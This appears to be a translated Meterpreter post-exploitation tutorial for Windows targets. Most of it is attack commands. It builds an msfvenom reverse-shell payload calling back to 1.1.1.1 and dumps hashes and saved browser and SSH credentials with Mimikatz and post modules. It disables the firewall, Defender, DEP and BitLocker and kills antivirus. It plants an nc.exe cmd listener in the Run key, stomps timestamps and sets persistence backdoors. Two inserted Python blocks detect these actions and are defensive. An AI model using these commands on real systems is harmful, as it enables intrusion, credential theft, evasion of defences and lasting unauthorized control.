The post-exploitation stage builds on the foothold gained once the target operating system is under control.
First, construct a payload
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe
Assume a target machine has executed the payload and a Meterpreter session has come back.

Escalating to higher privileges
View basic information
View system information
sysinfo
View the current user
getuid
View network environment
run get_local_subnets
View kernel
uname -a
View version
cat /etc/issue
Information collection module
Some commonly used post modules:
1. Check whether the target machine is a virtual machine
run post/windows/gather/checkvm

2. View the account and token of the target host
run post/windows/gather/credentials/credential_collector
3. View the installed software of the target machine
run post/windows/gather/enum_applications

4. Local privilege escalation suggester module
If the privileges obtained are not administrator or SYSTEM, and it is unknown whether a local privilege escalation vulnerability exists, the following module can test for one:
run post/multi/recon/local_exploit_suggester

It automatically runs through every check it can perform and then lists the exploits that appear feasible.
5. View recently opened files
run post/windows/gather/dumplinks
6. Retrieve web application credentials saved in the Firefox browser
Assume the target has Firefox installed and the account passwords have been saved in the browser.
run post/multi/gather/firefox_creds
7. View saved SSH credentials
run post/multi/gather/ssh_creds
8. Check whether a program on the system is malware. For example:
run post/multi/gather/check_malware REMOTEFILE=c:\\a.exe
9. Collect the password hashes on the system (administrator privileges are required)
run post/windows/gather/smart_hashdump
10. View the users logged on to the target machine
run post/windows/gather/enum_logged_on_users
11. Collect the login credentials of the target machine
run post/windows/gather/credentials/credential_collector
12. View the drives and partitions of the target machine
run post/windows/gather/forensics/enum_drives
13. Get the browser cache files (Internet Explorer)
run post/windows/gather/enum_ie
Information collection scripts
The collected target machine information is downloaded to the local machine
run winenum
run scraper
General operation
For more command operations, see the article [1]
Get system permission
getsystem
Get user password hashes
Obtains the user names and password hashes of the system accounts
hashdump
Get the machine's idle time (how long the user has been inactive)
idletime
Searching files on the target host
search command
For example, search for all .ini files on the host
search -f *.ini
Searching the whole computer may take a long time, and an attentive user may notice that the hard disk is constantly busy, so search in a specific directory instead. For example:
search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.pdf
Mimikatz extension
SYSTEM privileges are required
load mimikatz
The new commands are as follows: wdigest, kerberos, msv, ssp, tspkg, livessp

These commands all relate to the system's account credentials. mimikatz_command -f on its own does not print help, but the usage can be read from the error message


View system operation services
mimikatz_command -f service::list
View system processes
mimikatz_command -f process::list
Further command hints can be obtained from the error output

Turn off firewall
Prerequisite: a shell with administrator privileges on the target host, obtained through the vulnerability
Use the following command to turn off the firewall
shell netsh advfirewall set allprofiles state off
Checking confirms that the firewall has been turned off

Next, stop Windows Defender (the WinDefend service)
net stop windefend    // net stop is used to stop a Windows service
To view service status on Windows, press Win+R and run services.msc

Add a firewall policy
First open a command prompt
execute -f cmd -i -H    // open the shell hidden (no visible window)
View firewall status
netsh firewall show opmode
Add an allow policy
netsh firewall add portopening TCP 4444 "test" ENABLE ALL    // the rule name "test" can be chosen to look inconspicuous so that the rule is hard to pick out of the firewall policy
Kill antivirus software
At the meterpreter prompt, enter
run killav
You can also use the post module directly
run post/windows/manage/killav
Turn on Remote Desktop Services
run post/windows/manage/enable_rdp

Use the built-in scripts
Turn on Remote Desktop Services
run getgui -e
Add remote desktop user and password
run getgui -u user -p pass
Grab screen
screenshot
Or use plug-ins
load espia    // load the plug-in
screengrab    // capture the screen
Registry operation
registry

For example: we have obtained a Meterpreter session on the target host. By modifying the registry, the nc.exe uploaded to the target host will run every time the host starts, which makes it easy to keep monitoring the host.
1. Upload nc.exe to the target host
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32    // transferred into the system directory
2. Check which entries in the registry run at host startup by default
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run    // reg is a dedicated Meterpreter command for viewing and modifying the registry

3. Add a value
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'
// setval adds or modifies a value
// in -Ldp, L listens persistently, d runs detached in the background, p gives the port
// in short: a value named nc is added to the Run key whose data runs nc.exe from the system directory in the background, listening on port 444 and handing cmd.exe to whoever connects
After execution, check that the value was inserted successfully.

The following command can also be used
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc    // queryval queries a value

Additional registry options [2]
Disk encryption
BitLocker disk encryption. On some computers the files are encrypted and sealed off; BitLocker is one such encryption, integrated into the Windows operating system.
Turn off disk encryption on the target host:
manage-bde -off C:
To view disk encryption status:
manage-bde -status C:
Close DEP
DEP (Data Execution Prevention) is a hardware-based CPU protection technology. Disabling DEP makes it much easier to break through the target's defenses. The following command can be used
bcdedit.exe /set {current} nx AlwaysOff
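From the defender's side, every action in the firewall, Windows Defender, registry Run key, BitLocker and DEP sections above leaves a process command line or a registry write that endpoint telemetry records. The following is an added example, not code from the original post: a small rule set that flags exactly those actions in constructed process-creation and registry-set events (the event dict format and the sample telemetry are assumptions made for this example).

```python
import re

# Added example (not from the original post): flag the defence-tampering and
# persistence actions shown above in process-creation and registry-set events.
# The event dict format and the sample telemetry below are constructed.
PROCESS_RULES = {
    "firewall_all_profiles_off": r"netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off",
    "firewall_port_opened": r"netsh\s+firewall\s+add\s+portopening\b",
    "defender_service_stopped": r"net\d?\s+stop\s+windefend\b",
    "dep_always_off": r"bcdedit(\.exe)?\s+/set\s+\{current\}\s+nx\s+alwaysoff",
    "bitlocker_off": r"manage-bde(\.exe)?\s+-off\b",
    # nc.exe listening (-L, optional -d, -p <port>) and serving cmd.exe (-e)
    "nc_listener_with_shell": r"\bnc(\.exe)?\b.*-L\w*p\s+\d+.*-e\s+cmd(\.exe)?",
}
# Autostart keys, compared against the lower-cased registry path
RUN_KEYS = (r"software\microsoft\windows\currentversion\run",
            r"software\microsoft\windows\currentversion\runonce")

def match_process(cmdline):
    # Names of every rule matching a process command line
    return [name for name, pat in PROCESS_RULES.items()
            if re.search(pat, cmdline, re.IGNORECASE)]

def match_registry(key, data):
    # Any value set under a Run key is flagged; an nc listener stored there
    # (the persistence shown in the registry section above) is flagged again
    if not any(key.lower().endswith(rk) for rk in RUN_KEYS):
        return []
    hits = ["run_key_value_set"]
    if re.search(PROCESS_RULES["nc_listener_with_shell"], data, re.IGNORECASE):
        hits.append("run_key_nc_listener")
    return hits

def scan(events):
    # (event id, rule name) pairs for every matching event, in input order
    findings = []
    for ev in events:
        names = (match_process(ev["cmdline"]) if ev["type"] == "process"
                 else match_registry(ev["key"], ev["data"]))
        findings.extend((ev["id"], n) for n in names)
    return findings

# Constructed sample telemetry: the page's own commands plus one benign query
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "cmdline": "netsh advfirewall set allprofiles state off"},
    {"id": 2, "type": "process", "cmdline": "net stop windefend"},
    {"id": 3, "type": "process", "cmdline": 'netsh firewall add portopening TCP 4444 "test" ENABLE ALL'},
    {"id": 4, "type": "process", "cmdline": "bcdedit.exe /set {current} nx AlwaysOff"},
    {"id": 5, "type": "process", "cmdline": "manage-bde -status C:"},
    {"id": 6, "type": "registry", "key": "HKLM\\software\\microsoft\\windows\\currentversion\\run",
     "data": "C:\\windows\\system32\\nc.exe -Ldp 444 -e cmd.exe"},
]
```

Running scan(SAMPLE_EVENTS) flags events 1 to 4 and event 6 (twice), while the read-only manage-bde -status query in event 5 produces nothing.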
File access time modification
When files on the target system are operated on, file times are left behind: the creation time, the modification time and the change time. As the name suggests, a system administrator can use these three times to check whether and when a file has been changed and to judge whether the system has been compromised.
For penetration testing we naturally want to erase the traces of those changes. stat <file name> shows the file's time details.
timestomp is the Meterpreter command for viewing and modifying a file's times. View the file's times:
timestomp -v 1.txt
Compared with the stat command, it additionally shows the MFT entry time, e.g. Entry Modified: 2020-07-22 22:51:39 -0400

Change the MAC time of one file to copy according to the MAC time of another file
timestomp -f c:\\autoexec.bat 1.txt
Parameters for modifying specific times
-m    // modify the Modified time
-a    // modify the Accessed time
-c    // modify the Created time
-e    // modify the Entry Modified time
-z    // modify all four times
For example:
timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt
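The stomped times that timestomp -v or stat report are the $STANDARD_INFORMATION (SI) attribute of the NTFS MFT record; the $FILE_NAME (FN) attribute keeps a second set of the same four times that the Win32 API timestomp relies on does not rewrite. The following is an added example, not from the original post, showing how an investigator compares the two sets once they have been pulled from the MFT with a forensic parser; the dict layout and all timestamp values are constructed for the example.

```python
from datetime import datetime

# Added example (not from the original post): detect the timestomp pattern shown
# above by comparing an NTFS file's $STANDARD_INFORMATION (SI) times, which
# timestomp rewrites, with its $FILE_NAME (FN) times, which the Win32 API used
# by timestomp does not update. All timestamps below are constructed.
FIELDS = ("modified", "accessed", "created", "entry_modified")

def check_timestamps(si, fn):
    # si, fn: dicts keyed by FIELDS holding datetime values for one file.
    # Returns the indicators found; several together are strong evidence.
    indicators = []
    # SI created earlier than FN created: the SI times were set back in time
    # (e.g. timestomp -f copying an older file's times). A rename refreshes FN,
    # so this can also appear legitimately and is an indicator, not proof.
    if si["created"] < fn["created"]:
        indicators.append("si_created_before_fn_created")
    # timestomp -z takes a "MM/DD/YYYY HH24:MI:SS" string, so it zeroes the
    # sub-second part of all four times (NTFS normally keeps 100 ns precision).
    # Files copied from FAT media or extracted from zip archives are coarse too.
    if all(si[f].microsecond == 0 for f in FIELDS):
        indicators.append("si_zero_subseconds")
    # -z also sets all four SI times to exactly the same value
    if len({si[f] for f in FIELDS}) == 1:
        indicators.append("si_all_four_identical")
    return indicators

# Constructed MFT values for a file whose SI times were stomped with -z
STOMPED_SI = dict.fromkeys(FIELDS, datetime(2010, 1, 1, 0, 0, 0))
STOMPED_FN = dict.fromkeys(FIELDS, datetime(2020, 7, 22, 22, 51, 39, 123456))

# Constructed MFT values for an untouched file: FN created equals SI created,
# SI modified and entry-modified are later and keep their sub-second part
CLEAN_FN = dict.fromkeys(FIELDS, datetime(2020, 7, 22, 22, 51, 39, 123456))
CLEAN_SI = dict(CLEAN_FN, modified=datetime(2020, 7, 22, 22, 55, 10, 500000),
                entry_modified=datetime(2020, 7, 22, 22, 55, 10, 500000))

if __name__ == "__main__":
    print("stomped:", check_timestamps(STOMPED_SI, STOMPED_FN))
    print("clean:  ", check_timestamps(CLEAN_SI, CLEAN_FN))
```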
AutoRunScript
Payloads generally have advanced options.

Among them is the AutoRunScript option, which runs a script immediately after the payload executes.
For example: set AutoRunScript migrate -n explorer.exe means that as soon as a shell is obtained, the process is migrated into explorer.exe, so that the shell is not lost when the injected malicious exe is killed.
Or another script, for example to immediately view the most recently opened files on the target host:
set AutoRunScript post/windows/gather/dumplinks
If two scripts are to run one after the other, the one that should run first can be placed in the InitialAutoRunScript option.
Modify hosts file
run hostsedit -e 1.1.1.1,www.baidu.com
Persistent back door
metsvc
run metsvc -A    // use -r to remove it

This command creates a system service process named metsvc.exe that listens on port 31337 and starts itself at boot. The disadvantages are that the port cannot be configured and the name of the uploaded exe file cannot be changed.
Connect to the backdoor
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 1.1.1.1

It was stuck for a long time without returning a shell; presumably this module is no longer maintained.
persistence
Check the parameter options

-A    automatically start a matching exploit/multi/handler to receive the connection
-S    run on the system as a system service process
-X    start automatically when the system boots
-U    start automatically when the user logs on
-i    interval in seconds: while the service runs, call back every n seconds
-p    port
-r    IP address to connect back to, i.e. the Kali address
Examples:
run persistence -X -i 10 -p 4444 -r 1.1.1.1
run persistence -U -i 20 -p 4444 -r 1.1.1.1
run persistence -S -i 20 -p 4444 -r 1.1.1.1
Reference material
[1] General operation details: https://blog.csdn.net/Yu_csdnstory/article/details/107441171
[2] Additional registry details: https://support.accessdata.com/hc/en-us/articles/204448155-Registry-Quick-Find-Chart